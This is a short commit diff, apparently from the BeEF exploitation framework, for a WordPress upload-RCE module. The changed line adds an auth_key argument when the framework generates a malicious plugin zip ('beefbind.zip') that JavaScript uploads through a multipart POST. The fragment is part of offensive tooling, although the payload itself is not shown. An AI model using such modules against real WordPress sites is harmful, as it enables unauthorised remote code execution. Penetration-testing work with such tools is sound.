WordPress - Adds auth_key to Plugin, Use SecureRandom and Fixes fatal error when plugin file called directly
This commit is contained in:
@@ -41,7 +41,7 @@ beef.execute(function() {
|
||||
post_data += "filename=\"beefbind.zip\"\r\n";
|
||||
post_data += "Content-Type: application/octet-stream\r\n";
|
||||
post_data += "\r\n";
|
||||
post_data += "<%= Wordpress_upload_rce_plugin.generate_zip_payload %>";
|
||||
post_data += "<%= Wordpress_upload_rce_plugin.generate_zip_payload(@auth_key) %>";
|
||||
post_data += "\r\n";
|
||||
post_data += "--" + boundary + "--\r\n"
|
||||
|
||||
|
||||
Reference in New Issue
Block a user